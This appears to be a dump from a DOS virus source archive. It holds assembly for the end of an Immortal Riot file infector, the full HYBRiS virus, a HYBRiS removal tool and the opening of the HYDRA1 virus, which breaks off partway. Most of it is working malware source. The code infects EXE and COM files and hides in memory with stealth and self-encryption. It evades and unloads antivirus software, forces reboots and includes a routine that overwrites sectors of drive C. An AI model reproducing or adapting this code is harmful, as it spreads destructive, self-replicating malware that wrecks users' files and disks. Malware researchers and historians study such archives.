mov dx,100h ; its beginning
mov ah,40h ;
mov cx,666 ; How sadistical??
int 21h ;
call encrypt_decrypt ;
ret
encryption_value dw 0
encrypt_decrypt:
mov si,offset encryption_start
mov dx,encryption_value
mov cx,(end_of_virus-encryption_start+1)/2
xor_loop:
xor word ptr cs:[si],dx
add si,2
call fool_scan_for_TridenT_virus ; must call this meaningless
loop xor_loop ; routine, otherwise, infected
ret ; files will be reported by
fool_scan_for_TridenT_virus: ; SCAN as the "TridenT" virus.
ret
; just return.
encryption_start:
; get current drive
mov ah,19h ; get current drive
int 21h ;
push ax ;
; move to c:
mov ah,0Eh ;
mov dl,02h ; drive C:
int 21h
; get directory.
mov ah,47h
xor dl,dl
lea si,[bp+infernal+2ch]
int 21h
great:
; find first files (starting .exe's).
mov dx,offset ExeMask ; offset 'EXEMASK'
mov ah,4Eh ; find first
int 21h ; via int21
jnc go_for_it ; jmp if no ERROR
; if no exe's was found, just infect.COM files.
mov dx,offset ComMask ; offset 'COMMASK'
mov ah,4Eh ; find first file
;
again: ;
int 21h ;
jc chdir ;
go_for_it:
mov ax,4300h ; Get attribute of file
mov dx,9eh ; Pointer to name in DTA
int 21h ;
push cx ; Push the attrib to stack
mov ax,4301h ; Set attribute to
xor cx,cx ; normal
int 21h ;
mov ax,3D02h ; Open file
mov dx,9eh ; Pointer to name in DTA
int 21h
jc next ; if error, get next file
xchg ax,bx ; Swap AX & BX
; so the filehandle ends up
; in BX
mov ax,5700h ; Get file date
int 21h ;
push cx ; Save file dates
push dx ;
mov encryption_value,50 ; encryption_value.
call write_virus ; write to file(s).
pop dx ; Get the saved
pop cx ; filedates from the stack
mov ax,5701h ; Set them back to the file
int 21h ;
mov ah,3Eh ; Close the file
int 21h ;
pop cx ; Restore the attribs from
; the stack.
mov dx,9eh ; Pointer to name in DTA
mov ax,4301h ; Set them attributes back
int 21h ;
next:
mov ah,4Fh ; now get the next file
jmp short again ; and do it all over again
chdir:
; change directory to [..] and start infect again.
mov dx,offset dot_dot ; offset 'updir'
mov ah,3bh ; change directory
int 21h
jnc great ; jmp to great if no ERROR
exit:
; Throw the dice..
mov ah,2ch ;
int 21h ;
cmp dl,50
ja real_quit ;
jmp print
; no, quitting time, yet..
print:
; first print message.
mov ah,09h ; Print Fake message.
mov dx,offset sign ;
int 21h ;
get_random:
; Throw of a die..
mov ah,2ch ; Randomize.
int 21h ;
cmp dl,10 ;
ja real_quit ;
jmp trash ; bad bad boy..
trash:
; Trash routine from Nowhere Man of [NuKE], thanks.
cli ;
mov ah,2 ; 2=C:
cwd ;
mov cx,0100h ;
int 026h ;
JMP REAL_QUIT
real_quit:
pop dx ;
mov ah,0Eh ; restore org. drive
int 21h ;
; restore directory
lea dx,[bp+infernal+2ch]
mov ah,3bh
int 21h
; time to quit
mov ah,4ch ; return to prompt
int 21h ; via int21
; some data.
ExeMask db '*.EXE',0 ; tought one, huh?
ComMask db '*.COM',0 ; what is this, hm
dot_dot db '..',0 ; '..'
Note db 'That is not dead '
db 'Which can eternal lie '
db 'Yet with strange aeons '
db 'Even death may die '
db 'LiVe AfteR DeATH...'
db 'Do not waste your time '
db 'Searching For '
db 'those wasted years! '
db '(c) 93/94 The Unforgiven/Immortal Riot '
db 'Thanks to Raver and Metal Militia/IR '
truenote db 'Maria K - Life is limited, love is forever... '
db 'Open to reality, forever in love... '
sign db 'Program too big to fit in memory$' ; fake message!
sadistical db ' ***HUMAN GREED*** The answer of all evil on earth! '
db 'Do You Belive? '
db 'Farwell!....'
end_of_virus:
infernal:
cseg ends
end virus_start

896
MSDOS/Virus.MSDOS.Unknown.hybris.asm Normal file
View File

@ -0,0 +1,896 @@
;===============================================================================
; HYBRiS (c) 1995 The Unforgiven/Immortal Riot
; Brief description:
; TSR COM-infecting, full-stealth virus
; Self-encrypted
; Wasn't scannable when it was released by FP/Tbav/AVP..
; Has quite some collection of grafical payloads (hoping to get AVP attention).
; Multipe interrupt handlers
; Int24h hooking
; Anti-anti-VSAFE-viruses.
; Special thanks to Priest & Stormbringer of Phalcon/Skism
;===============================================================================
.model tiny
.code
org 100h
vir_size equ virus_end-virus_start
virus_start:
jmp entry_point
install:
mov ax,99 ;input = rnd_value in AX
call random ;output = (zero -> rnd_value)
jne get ;if output=0, activate..
mov cs:[activate_flag][bp],1
get:
mov ax,108
call random
jne real_get
start_payload:
call main_payload ;'loop' until ESC is being pressed..
in al,60h
cmp al,1
jne start_payload
jmp short real_get
main_payload: ;remake of a payload I wrote for
mov ax,3 ;IR#6..
int 10h
push ax
push cx
push dx
mov ax,03f00h
mov dx,03c8h
out dx,al
inc dx
mov ax,-1
out dx,al
xchg al,ah
out dx,al
xchg al,ah
out dx,al
mov cx,-1
loop $
dec dx
xor ax,ax
out dx,al
inc dx
out dx,al
out dx,al
out dx,al
pop dx
pop cx
pop ax
ret
real_get:
mov ah,4ah ;Residency routine combined with
mov bx,-1 ;installation check
mov cx,0d00dh
int 21h
cmp ax,cx
jne not_res
jmp already_resident
not_res:
mov ah,4ah ;resize mcb
sub bx,(vir_size+15)/16+1 ;bx=size in para's
int 21h ;es =segment
mov ah,48h ;allocate memory block
mov bx,(vir_size+15)/16 ;bx = size in para's
int 21h ;returns pointer to the beginning
;of the new block allocated
dec ax ;dec ES to get pointer to mcb
mov es,ax ;es=segment
mov word ptr es:[1],8 ;ofs:1 in mcb = owner, 8 = dos
push cs ;cs=ds
pop ds
cld ;clear direction
sub ax,0fh ;substact 15 from ax,
mov es,ax ;thus es:[100h] = start of allocated memory
mov di,100h ;di = 100h (beginning of file)
lea si,[bp+offset virus_start] ;si points to start of virus
mov cx,(vir_size+1)/2 ;copy it resident with words
rep movsw ;until cx = 0 (the whole virus copied)
push es ;es=ds
pop ds
mov ax,3521h ;get interrupt vector from es:bx for
int 21h ;int21h
tb_lup:
cmp word ptr es:[bx],05ebh ;all tbav's utils starts with this code,
jne no_tbdriver ;if its found, get next interrupt handler
cmp byte ptr es:[bx+2],0eah ;and use that as the int21h adress
jne no_tbdriver ;thereby, cutting tbav out from our
les bx,es:[bx+3] ;int21h handler. loop until it's out of
jmp tb_lup ;there. (dunno if this works anymore..)
no_tbdriver:
mov word ptr ds:[Org21ofs],bx ;save segment:offset for int21h
mov word ptr ds:[Org21seg],es ;in a word each
cmp byte ptr cs:[activate_flag][bp],1 ;check if we should activate
jne skip_08_get ;the int8 handler
mov al,08h ;if so, get interrupt-vector
int 21h ;for int8h
mov word ptr ds:[org08ofs],bx
mov word ptr ds:[org08seg],es
skip_08_get:
mov al,09h ;int9
int 21h
mov word ptr ds:[org09ofs],bx
mov word ptr ds:[org09seg],es
mov al,16h ;16h
int 21h
mov word ptr ds:[org16ofs],bx
mov word ptr ds:[org16seg],es
mov dx, offset new_int21h ;set new interrupt handlers
mov ax,2521h ;to ds:dx for int21h
int 21h
cmp byte ptr cs:[activate_flag][bp],1 ;if we didnt get int8, dont
jne skip_08_set ;set a new either!
mov dx, offset new_08h
mov al,08h
int 21h
skip_08_set:
mov dx,offset new_09h ;int9 handler installed
mov al,09h
int 21h
mov dx,offset new_16h ;int 16h handler installed
mov al,16h
int 21h
already_resident:
tbdriver:
mov di,100h
push di ;save di at 100h
push cs ;make cs=ds=es
push cs
pop es
pop ds
lea si,[bp+orgjmp] ;and copy the first 4-init-bytes to
movsw ;the beginning (in memory) so we can
movsw ;return back to the host properly
ret ;jmp di, 100h (since we pushed it above)
new_int21h:
cmp ah,4ah ;installation check part at the beginning
jne chk_vsafe ;no 4ah executed, try next option
cmp bx,-1 ;ah = 4ah, check if bx and cx is set by
jne no_match ;our virus
cmp cx,0d00dh
jne no_match ;no.
mov ax,cx ;move cx into ax
iret ;and do a interrupt return
chk_vsafe:
cmp ax,0fa01h ;a resident anti-virus-virus,
jne chk_exec ;checker
cmp dx,5945h
je go_vsafe
chk_exec:
cmp ax,4b00h ;Since this is a com infector only,
je go_infect ;I don't have to check if al=0, still
;I do it :).
chk_close:
cmp ah,3eh ;check for file-closes
je go_close ; ==> infect
cmp ah,3dh ;file open
je go_disinfect ; ==> disinfect
chk_dir:
cmp ah,11h ;stealth functions on
je go_fcb_stealth ;directory listenings with
cmp ah,12h ;11/12/4e/4fh
je go_fcb_stealth
cmp ah,4eh
je go_handle_stealth
cmp ah,4fh
je go_handle_stealth
no_match:
jmp do_oldint21h ;nothing matched!
go_vsafe: ;indirect-jumps due to 128d bytes jmp's
jmp unload_vsafe ;directives.
go_infect:
jmp infect
go_close:
call setcritical ;if infect on close, install a critical
jmp infect_close ;error handler before
go_disinfect:
call setcritical ;disinfect calls also modifies programs,
jmp disinfect_dsdx ;install the int24h handler before trying
;doing disinfection
go_fcb_stealth: ;11 & 12h calls get's here, to be
jmp hide_dir ;transfered into another routine
;(* Very unstructured programming *)
go_handle_stealth:
jmp hide_dir2
dps db "THIS PROGRAM IS (C) 1995 IMMORTAL RIOT",0 ; no shit!
new_08h:
push ax ;If the int08h installer is
push dx ;installed, the screen background
mov dx,03c8h ;color will fade to white return
xor al,al ;to original color (black), and
out dx,al ;'loop' that procedure all over again
inc dx ;since its activated all the time by
mov al,[cs:bgcol] ;dos internal services. .
out dx,al
out dx,al
out dx,al
inc [cs:bgcol]
pop dx
pop ax
db 0eah
org08ofs dw ?
org08seg dw ?
bgcol db 0
new_09h:
push ax ;preserve register in use
push ds
xor ax,ax
mov ds,ax ;ds=0
in al,60h ;read key
cmp al,53h ;delete?
jnz no_ctrl_alt_del ;no!
test byte ptr ds:[0417h],0ch ;test for alt OR ctrl
je no_ctrl_alt_del ;
jpo no_ctrl_alt_del ;<- Wow. ctrl and alt?
in al,40h ;A small randomizer, this gives us
and al,111111b ;one in 64 I reckon :-).
cmp al,111111b
je no_ctrl_alt_del
push cs
pop ds
mov ax,3 ;set grafic mode and clear screen, too
int 10h
mov ah,2 ;set cursor pos
xor bh,bh
mov dx,0A14h ;10,20d (middle)
int 10h
mov ah,1 ;set cursor
mov cx,2020h ;>nul
int 10h
mov si,offset dps ;point to v_name, of sorts.
all_chars:
loop all_chars
lodsb ;load string by byte from dps
or al,al ;end of string? (al=0)
je cold_boot ;yes, make a cold boot
mov ah,0Eh ;display character from string
int 10h
jmp short all_chars ;put next char to string
cold_boot:
db 0eah ;jmp far ptr
db 00h, 00h, 0ffh,0ffh
no_ctrl_alt_del:
pop ds ;restore registers
pop ax
do_oldint09h:
db 0eah ;and jump to saved vector for int09h
org09ofs dw ?
org09seg dw ?
new_16h:
cmp ax,0fa01h ;check ax for 'vsafe-unload-value'
jne do_oldint16h ;no match in ax.
cmp dx,5945h ;check ds for 'vsafe-unload-value'
jne do_oldint16h ;no match in dx.
jmp unload_vsafe ;program is probably virus-infected.
do_oldint16h:
db 0eah ;program is not trying to unload
org16ofs dw ? ;vsafe..
org16seg dw ?
hide_dir: ;FCB stealth routine
pushf ;simulate a int call with pushf
push cs ;and cs, ip on the stack
call do_oldint21h
or al,al ;was the dir call successfull??
jnz skip_dir ;(i.e. did we find files?)
push ax ;we did find files, save ax/bx/es
push bx ;since we use them in this routine
push es
mov ah,62h ;get active PSP to es:bx
int 21h
mov es,bx
cmp bx,es:[16h] ;PSP belongs to dos?
jnz bad_psp ;no, just stealth on DIR (ie. command.com
;is the owner of the psp)
mov bx,dx ;offset to unopened FCB in BX
mov al,[bx] ;FCB-type in AL..
push ax ;Save it
mov ah,2fh ;Get DTA-area
int 21h
pop ax ;Restore AX
inc al ;check if al=0 or al=ff
jnz no_ext ;If it's not 0, then, it's not extended
add bx,7 ;if it's extended add 7 to skip garbage
no_ext:
mov al,byte ptr es:[bx+17h] ;get seconds field
and al,1fh
xor al,1dh ;is the file infected??
jnz no_stealth ;if not - don't hide size
cmp word ptr es:[bx+1dh],vir_size-3 ;if a file with same seconds
jbe no_stealth ;as an infected is smaller -
sub word ptr es:[bx+1dh],vir_size-3 ;don't hide size
no_stealth:
bad_psp:
pop es ;restore segments/registers
pop bx ;used and return to caller
pop ax
skip_dir:
iret
hide_dir2: ;4e/4fh stealth
pushf
push cs
call do_oldint21h
jc no_files
pushf
push ax
push di
push es
push bx
mov ah,2fh
int 21h
mov di,bx
add di,1eh
cld
mov cx,9 ;scan for the '.' which seperates
mov al,'.' ;the filename from the extension
repne scasb
jne not_inf ;<- Filename without any extension!
cmp word ptr es:[di],'OC'
jne not_inf ;most likely a com
cmp byte ptr es:[di+2],'M'
jne not_inf ;Definitly com
mov ax,es:[bx+16h] ;ask file time
and al,1fh
xor al,1dh ;can the file be infected?
jnz not_inf
cmp word ptr es:[bx+1ah],vir_size ;dont stealth too small
ja hide ;files
cmp word ptr es:[bx+1ch],0 ;>64k? (no-com)
je not_inf ;don't stealth too large files..
hide:
sub es:[bx+1ah],vir_size-3 ;stealth
not_inf:
pop bx
pop es
pop di
pop ax
popf
no_files:
retf 2
infect_close: ;3eh calls arrives at this entry
push es
push bp
push ax
push bx
push cx
push si
push di
push ds
push dx
cmp bx,4 ;don't close null, aux and so
jbe no_close
call check_name ;es:di points to file name
add di,8 ;es:di points to extension
cmp word ptr es:[di],'OC'
jne no_close
cmp byte ptr es:[di+2],'M' ;es:di+2 points to 3rd char in extension
je close_infection
no_close:
pop dx ;no com-file being opened
pop ds
pop di
pop si
pop cx
pop bx
pop ax
pop bp
pop es
jmp do_oldint21h
close_infection:
or byte ptr es:[di-26h],2
mov cs:Closeflag,1 ;mark that 3e-infection = on
mov ax,4200h ;seek tof.
xor cx,cx
cwd
int 21h
jmp short infect_on_close ;infect it
check_name:
push bx
mov ax,1220h ;get job file table for handle at es:di
int 2fh
mov ax,1216h ;get system file table
mov bl,byte ptr es:[di] ;for handle index in bx
int 2fh
pop bx
add di,20h ;es:di+20h points to file name
ret ;return
infect:
push es
push bp
push ax
push bx
push cx
push si
push di
push ds
push dx
call setcritical ;install a critical error handler
mov cs:Closeflag,0 ;make sure closeflag is off
mov ax,4300h ;get attrib
int 21h
push cx ;save attrib onto the stack
mov ax,4301h ;clear attrib
xor cx,cx
int 21h
mov ax,3d00h ;open file in read mode only
int 21h
xchg ax,bx
mov ax,1220h
int 2fh
push bx
mov ax,1216h ;modify
mov bl,byte ptr es:[di]
int 2fh
pop bx
or byte ptr es:[di+2],2 ;to read & write mode in the SFT-entry
infect_on_close: ;entry for infection on 3eh
push cs ;cs=ds
pop ds
mov ax,5700h ;get time/date
int 21h
push cx ;save time/date onto the stack
push dx
mov ah,3fh ;read first four bytes to orgjmp
mov cx,4
mov dx,offset ds:orgjmp
int 21h
cmp word ptr ds:orgjmp,'ZM' ;check if .EXE file
je exe_file
cmp word ptr ds:orgjmp,'MZ'
je exe_file ;if so - don't infect
cmp byte ptr ds:orgjmp+3,'@' ;dont reinfect!
jne lseek_eof
jmp skip_infect
exe_file:
mov cs:exeflag,1 ;mark file as EXE-file, and
jmp short skip_infect ;don't set second value for it!
lseek_eof:
mov ax,4202h ;go end of file, offset in dx:cx
xor cx,cx ;and return file size in dx:ax.
xor dx,dx
int 21h
cmp ax,(0FFFFH-Vir_size) ;dont infect to big or
jae skip_infect ;to small files
cmp ax,(vir_size-100h)
jb skip_infect
add ax,offset entry_point-106h ;calculate entry offset to jmp
mov word ptr ds:newjmp[1],ax ;move it [ax] to newjmp
get_rnd:
mov ah,2ch ;get random number and put enc_val
int 21h
or dl,dl ;dl=0 - get another value!
je get_rnd
mov word ptr ds:enc_val,dx
mov ax,08d00h ;copy entire virus to 8d00h:100h
mov es,ax
mov di,100h
mov si,di
mov cx,(vir_size+1)/2
rep movsw
push es
pop ds
xor bp,bp ;and encrypt it there
call encrypt
mov ah,40h ;write virus to file from position
mov cx,virus_end-install ;08d00h:100h
mov dx,offset install
int 21h
push cs ;cs=ds
pop ds
mov ax,4200h ;go to beginning of file
xor cx,cx
cwd
int 21h
mov ah,40h ;and write a new-jmp-construct
mov cx,4 ;of 4 bytes (4byte=infection marker)
mov dx,offset newjmp
int 21h
skip_infect:
mov ax,5701h ;restore
pop dx ;date
pop cx ;time
cmp byte ptr cs:[exeflag],1 ;exe file?
je skip_sec ;if so - keep the sec_value intact
or cl,00011101b ;and give com-files second value
and cl,11111101b ;29
skip_sec:
int 21h
cmp byte ptr cs:[Closeflag],1 ;check if execute or close infeection,
je dont_close ;if infect on close, dont close file
close_file:
mov ah,3eh ;close the file which were executed
int 21h
pop cx ;get original file-attribs
dont_close:
pop dx ;ds:dx = filename
pop ds
cmp byte ptr cs:[Closeflag],1
je exit_close
mov ax,4301h ;set back saved attribute
int 21h
exit_close:
mov byte ptr cs:closeflag,0
call resetcritical ;set back critical error handler int24h
pop di
pop si
pop cx
pop bx
pop ax
pop bp
pop es ;restore registers in use
do_oldint21h:
O21h:
db 0eah ;jmp far ptr
org21ofs dw ? ;s:o to
org21seg dw ? ;int21h
ret ;call to DOS. . . return!
unload_vsafe:
mov ah,9
mov dx, offset v_name
push ds
push cs
pop ds
int 21h
pop ds
mov ax,4c00h ;exit program infected with an other
int 21h ;virus.
v_name db "[HYBRiS] (c) '95 =TU/IR=",'$'
closeflag db 0
exeflag db 0
activate_flag db 0
disinfect_dsdx:
push ax
push bx
push cx
push dx
push di
push si
push ds
push es ;save all regs/segs...
push ds
pop es ;ds=es
mov cx,64 ;scan for the dot which
mov di,dx ;seperates filename from
mov al,'.' ;extension
cld ;clear direction
repne scasb ;
jne nocom ;<- was no '.' in filename
;(aint likely a comfile)
cmp word ptr ds:[di],'OC'
je smallc
cmp word ptr ds:[di],'oc'
jne nocom
smallc:
cmp byte ptr ds:[di+2],'M'
je open_com
cmp byte ptr ds:[di+2],'m'
je open_com
nocom:
jmp no_com_opened ;no com-file being opened!
open_com:
mov ax,3d02h ;Tbav utils might intercept this
pushf ;action.
push cs
call o21h
xchg ax,bx
push cs ;cs=ds=es
pop ds
push cs
pop es
mov ax,5700h ;get time
int 21h
push cx
push dx
and cl,1fh ;see if seconds = 29
xor cl,1dh
jne close_dis ;its not! (file = not infected)
mov ah,3fh ;read first bytes of the infected
mov cx,4 ;program
mov dx,offset ds:orgjmp
int 21h
cmp byte ptr ds:orgjmp,0e9h ;first byte = jmp?
jne close_dis
cmp byte ptr ds:orgjmp+3,'@' ;fourth byte = '@'?
jne close_dis
mov ax,4202h ;opened file is infected,
mov cx,-1 ;seek the location where we
mov dx,-(virus_end-orgjmp) ;stored the first bytes of the
int 21h ;original program
mov ah,3fh ;read those bytes to orgjmp
mov cx,4
mov dx,offset ds:orgjmp
int 21h
mov ax,4200h ;seek the beginning of file
xor cx,cx
xor dx,dx
int 21h
mov ah,40h ;write the original bytes to
mov dx,offset orgjmp ;the top of file
mov cx,4
int 21h
mov ax,4202h ;seek (endoffile-virussize)
mov cx,-1
mov dx,-(virus_end-install)
int 21h
mov ah,40h ;truncate file
xor cx,cx
int 21h
close_dis:
mov ax,5701h ;restore saved
pop dx ;date
pop cx ;and time
int 21h ;
mov ah,3eh ;close the file
pushf
push cs
call o21h
no_com_opened:
pop es
pop ds
pop si
pop di
pop dx
pop cx
pop bx
pop ax
bail_out:
jmp o21h ;and bail out!
random:
push ds
push bx
push cx
push dx
push ax
xor ax,ax
int 1ah
push cs
pop ds
in al,40h
xchg cx,ax
xchg dx,ax
mov bx,offset ran_num
xor ds:[bx],ax
rol word ptr ds:[bx],cl
xor cx,ds:[bx]
rol ax,cl
xor dx,ds:[bx]
ror dx,cl
xor ax,dx
imul dx
xor ax,dx
xor ds:[bx],ax
pop cx
xor dx,dx
inc cx
je random_ret
div cx
xchg ax,dx
random_ret:
pop dx
pop cx
pop bx
pop ds
or ax,ax
ret
SetCritical:
push ax ds
mov ax,9
mov ds,ax
push word ptr ds:[0]
push word ptr ds:[2]
pop word ptr cs:[OldCritical+2]
pop word ptr cs:[OldCritical]
mov word ptr ds:[0],offset CriticalError
push cs
pop word ptr ds:[02]
pop ds
pop ax
ret
ResetCritical:
push ax
push ds
push word ptr cs:[OldCritical]
mov ax,9
push word ptr cs:[OldCritical+2]
mov ds,ax
pop word ptr ds:[2]
pop word ptr ds:[0]
pop ds
pop ax
ret
CriticalError: ;new int24h handler
mov al,3 ;returns no error
iret
OldCritical dd 0 ;dw 0,0
ran_num dw ?
decrypt:
encrypt:
mov ax,word ptr ds:[bp+enc_val] ;enc value in ax
lea di,[bp+install] ;pointer to encryption start
mov cx,(encrypt-install)/2 ;number of words to be encrypted
xor_loopy:
xor word ptr ds:[di],ax
inc di
inc di
loop xor_loopy
ret
enc_val dw 0
entry_point:
call get_bp ;to get the delta offset
;classic old trick..
get_bp:
pop bp
sub bp, offset get_bp
call decrypt ;decrypt virus
jmp install ;jmp to install code
newjmp db 0e9h,00h,00h,'@' ;buffer to calculate a new entry
orgjmp db 0cdh,20h,00,00 ;buffer to save the 4 first bytes
virus_end:
end virus_start
================================================================================

341
MSDOS/Virus.MSDOS.Unknown.hybrisav.asm Normal file
View File

@ -0,0 +1,341 @@
.model tiny
.code
org 100h
start:
jmp short begin_code
copyright db "HYBRiS.1435 Remover. (c) 1995 The Unforgiven/Immortal Riot",0
begin_code:
push dx ; Cool self-check..
push ds
mov ah,9
mov dx,offset intro_msg
int 21h
pop bx
pop dx
cmp bx,dx
jne wrong
mov ah,9
mov dx,offset ok_msg
int 21h
jmp short start_msg1
wrong:
mov ah,9
mov dx,offset wrong_msg
int 21h
int 20h
intro_msg db 'Selfcheck $'
ok_msg db 'OK',13,10,'$'
wrong_msg db 'Failed',13,10,'$'
start_msg1:
mov ah,9 ;print starting msg...
mov dx, offset begin
int 21h
mov ah,0 ;did they agree on the rules?
int 16h
cmp ah,15h ;y/Y
je ok_phile ;yes, they did
mov ah,9 ;print blah..
mov dx, offset not_yes
int 21h
int 20h
not_yes db "User Failure!",13,10,07,36
ok_phile:
mov ah,4ah ;Do a virus installation check. . .
mov bx,0ffffh
mov cx,0d00dh
int 21h
cmp ax,cx ;ax=cx=d00d= the virus is TSR. . .
jne not_res
mov ah,9
mov dx, offset resident
int 21h
int 20h
not_res:
mov ah,2fh ;Get DTA-area to es:bx
int 21h
mov ah,4eh ;find first file matching ds:dx (com)
;with any attribute
next:
mov cx,7
mov dx, offset f_com
int 21h
jc no_com ;we have no more com-files
call main ;got a com-file - search it
mov ah,4fh ;get next com-file
jmp short next
no_com:
terminate: ;no more files!
mov ah,9
mov dx, offset stat1
int 21h
; This nice statistics is made by Blonde. Greetings to him.
mov dx, word ptr [count]
call dec16out
mov ah,9
mov dx, offset stat2
int 21h
mov dx, word ptr [inf]
call dec16out
mov ax,4cffh
int 21h
main:
inc byte ptr [count]
push ax
push bx
push cx
push dx
push di
push si
push es
push es
pop ds
push cs
pop es
mov si,bx
add si,1Eh ;bx = pointer to fname (1eh)
mov di,offset fname_buf
mov cx,0Fh ;cx=15
push cx ;save cx = 15
push di ;save di (fname)
rep movsb ;rep until cx=0
pop di ;restore di
pop cx ;and set cx=15
xor al,al ;zero out al
cld ;Clear direction
repne scasb ;Scan es:[di] for al
push di ;save di
mov al,20h ;
rep stosb ;Store al (fname) to es:[di]
mov byte ptr es:[di],36 ;'$'
pop di
pop es
push cs
pop ds
;mov ah,9 ;print fname
;mov dx,offset fname_buf
;int 21h
mov cx,15 ;with BIOS function due to this procedure
mov si, offset fname_buf ;can be used quite frequently. This is
lup: lodsb ;faster
int 29h ;mov ah,0ch, int 10h
loop lup
mov ax,3d02h ;prepare open in read/write access
mov dx,bx ;bx into dx
add dx,1eh ;bx = pointer to fname
push es ;make es=ds
pop ds
int 21h ;do it!
jnc read_file
mov ah,9 ;uerm? we couldnt open the file
mov dx, offset error_open ;fucking write-protected.. or lame coding
int 21h ;not zoinking f_attribs??
jmp no_inf
read_file:
mov bx,ax ;place file handle in bx
mov ah,3fh ;read first 4 bytes of the file
mov cx,4 ;to a buffer in memory
mov dx, offset read_buf
int 21h
cmp byte ptr ds:[read_buf+3],'@' ;4th byte = @?
jne No_inf
cmp byte ptr ds:[read_buf],0e9h ;1st byte = jmp?
jne no_inf
inc byte ptr [inf]
mov ah,9 ;say that the file is infected
mov dx, offset is_inf
int 21h
mov ah,0 ;wait keypress
int 16h
cmp ah,15h ;y/Y ?
je remove ; => they want to remove it..
jmp no_inf
remove:
mov ax,4202h
mov cx,-1
mov dx,-4
int 21h
mov ah,3fh ;read those bytes to a buffer
mov cx,4
mov dx,offset read_buf
int 21h
mov ax,4200h ;seek the beginning of file
xor cx,cx
xor dx,dx
int 21h
mov ah,40h ;write the original bytes to
mov dx,offset read_buf ;the top of file
mov cx,4
int 21h
mov ax,4202h ;seek (filesize-vir_size)
mov cx,-1
mov dx,-1435
int 21h
mov ah,40h ;truncate vir_size..
xor cx,cx
int 21h
mov ah,9 ;Report that the file is clean. . .
mov dx, offset _clean
int 21h
mov byte ptr [clean_f],1
no_inf:
cmp byte ptr [clean_f],1
je skip
mov ah,9 ;say that the file is infected
mov dx, offset is_cle
int 21h
skip:
mov ah,9 ;print linefeed instead of
mov dx, offset linefeed ;mov byte ptr es:[di-1],13
int 21h ;mov byte ptr es:[di],10
;mov byte ptr es:[di+1],36 (see above)
;this is simpler for reporting. . .
mov ah,3eh ;close file
int 21h
pop si ;restore registers in use
pop si
pop dx
pop cx
pop bx
pop ax
ret ;and return to caller
dec16out:
push ds ;This convertation is
push di ;Blonde(tm)
push dx
push cx
push ax
xor cx,cx ;initialize the counter
lea di, buf ;point to a buffer
dec16out1:
push cx ;save the count
mov ax,dx ;AX is the numerator
xor dx,dx ;clear upper half
mov cx,10 ;divisor of 10
div cx ;divide
xchg ax,dx ;get quotient
add al,30h ;increase to ASCII
mov [di],al ;put in byte in ascii-format
inc di ;point to next byte
pop cx ;restore count
inc cx ;count the digit
or dx,dx ;done? (dx=0?)
jnz dec16out1 ;if not zero, loop until dx = 0
dec16out2:
dec di ;decreasment of di
mov dl,[di]
mov ah,2
int 21h ;write dl to screen output
loop dec16out2
pop ax ;restore registers
pop cx
pop dx
pop di
pop ds
ret ;and return
begin:
db "Remover for the HYBRIS virus: This program is free of charge for all users.",13,10
db 'DISCLAIMER: This software is provided "AS IS" without warranty of any kind,',13,10
db "either expressed or implied, including but not limited to the fitness for",13,10
db "any particular purpose. The entire risc as to its quality of performance",13,10
db "is assumed by the user. Agree with those rules [Y/N]",13,10,36
f_com db "*.COM",0 ;COM-spec
buf dw ?
read_buf db ?,?,?,? ;4 buffers to read into
is_inf db "Is infected! Remove it? [Y/N]$ "
_clean db " File is now clean....$"
is_cle db "is clean...$"
error_open db " Error open file$ ";shouldnt happen. . .
resident db "Virus is already resident, aborting$"
fname_buf db 65 dup (?) ;fname = max 64, but ah well!
linefeed db 0ah,0dh,'$' ;linefeed+ end of print marker.
count dw 0
inf dw 0
clean_f db ?
host_clean db "Self-checking OK!",13,10,36
host_infected db "Program is infected and will not run$",13,10
stat1 db 13,10
db "Number of files scanned: $"
stat2 db 13,10
db "Number of files cleaned: $"
end start
================================================================================

196
MSDOS/Virus.MSDOS.Unknown.hydra1.asm Normal file
View File

@ -0,0 +1,196 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ HYDRA1 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 27-Aug-91 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
;ÛÛ Copyright (c) ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
psp_cmd_size equ 80h
data_12e equ 100h
data_13e equ 193h
data_14e equ 196h
data_15e equ 271h
data_16e equ 293h
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
hydra1 proc far
start:
jmp loc_1
pop cx
inc sp
add [bx+si],al
data_3 db 'HyDra-1 Beta - Not For Release'
db '. *.CO?'
db 0
data_6 dw 0, 8B39h
data_8 dw 0
data_9 db 0
db 29 dup (0)
data_10 db 0
db 13 dup (0)
data_11 db 'HYDRA$'
copyright db 'Copyright (c)'
db ' 1991 by C.A.V.E. $'
loc_1:
push ax
mov ax,cs
add ax,1000h
xor di,di ; Zero register
mov cx,193h
mov si,100h
mov es,ax
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ah,1Ah
mov dx,offset data_9
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
mov ah,4Eh ; 'N'
mov dx,offset data_3+22h ; ('*')
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_5 ; Jump if carry Set
loc_2:
mov ah,3Dh ; '='
mov al,2
mov dx,offset data_10
mov al,2
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
push es
pop ds
mov ax,3F00h
mov cx,0FFFFh
mov dx,data_13e
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
add ax,193h
mov cs:data_8,ax
cmp word ptr ds:data_14e,4459h
jne loc_3 ; Jump if not equal
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jc loc_6 ; Jump if carry Set
jmp short loc_2
loc_3:
xor cx,cx ; Zero register
mov dx,cx
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
